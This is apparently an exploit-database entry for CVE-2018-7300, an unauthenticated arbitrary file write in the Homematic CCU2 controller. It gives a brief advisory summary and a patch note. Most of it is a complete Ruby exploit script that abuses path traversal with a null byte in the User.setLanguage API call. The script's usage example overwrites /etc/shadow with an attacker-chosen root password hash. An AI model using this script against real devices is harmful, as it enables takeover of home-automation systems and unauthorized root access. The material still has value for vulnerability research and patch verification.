Homematic CCU2 Arbitrary File Write

vendor:

Homematic CCU2

by:

Patrick Muench, Gregor Kopf

8.8

CVSS

HIGH

Arbitrary File Write

264

CWE

Product Name: Homematic CCU2

Affected Version From: 2.29.23

Affected Version To: 2.29.23

Patch Exists: YES

Related CWE: 2018-7300

CPE: a:eq-3:homematic_ccu2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Homematic CCU2 Arbitrary File Write

The Homematic CCU2 is vulnerable to an arbitrary file write vulnerability. This vulnerability allows an attacker to write arbitrary files to the file system of the Homematic CCU2. This vulnerability is due to the lack of authentication when sending requests to the Homematic CCU2 API. An attacker can exploit this vulnerability by sending a specially crafted request to the Homematic CCU2 API.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their Homematic CCU2 to the latest version.

Source

Exploit-DB raw data:

#!/usr/bin/ruby

# Exploit Title: Homematic CCU2 Arbitrary File Write
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7300

# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite

require 'net/http'
require 'net/https'
require 'uri'
require 'json'

unless ARGV.length == 3
  STDOUT.puts <<-EOF
Please provide url

Usage:
  write_files.rb <ip.adress> <file path> <content of the file>

Example:
  write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'

  or

  write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'

EOF
  exit
end

# The first argument specifiee the URL and if http or https is used
url = ARGV[0] + "/api/homematic.cgi"

# The second argument specifies the file into which the content should be written
homematic_file_path = ARGV[1]

# The third argument specifies the content of the file
homematic_file_content = ARGV[2]

# define the json body for the attack
body = {
        "version": "1.1",
        "method": "User.setLanguage",
        "params": {
                    "userName": "file path",
                    "userLang": "file content"
                  }
        }.to_hash

# define the traversal with the file you want to write
body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"

# define the content
body[:params][:userLang] = homematic_file_content

# split the uri to access it in a easier way
uri = URI.parse(url)

# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|

  # define post request
  request = Net::HTTP::Post.new(uri.request_uri)

  # define the content type of the http request
  request.content_type = 'application/json'

  # define the request body
  request.body = body.to_json

  # send the request to the homematic ccu2
  response = http.request(request)

  # print response message code and status to cli
  puts 'Response code: ' + response.code + ' ' + response.message
end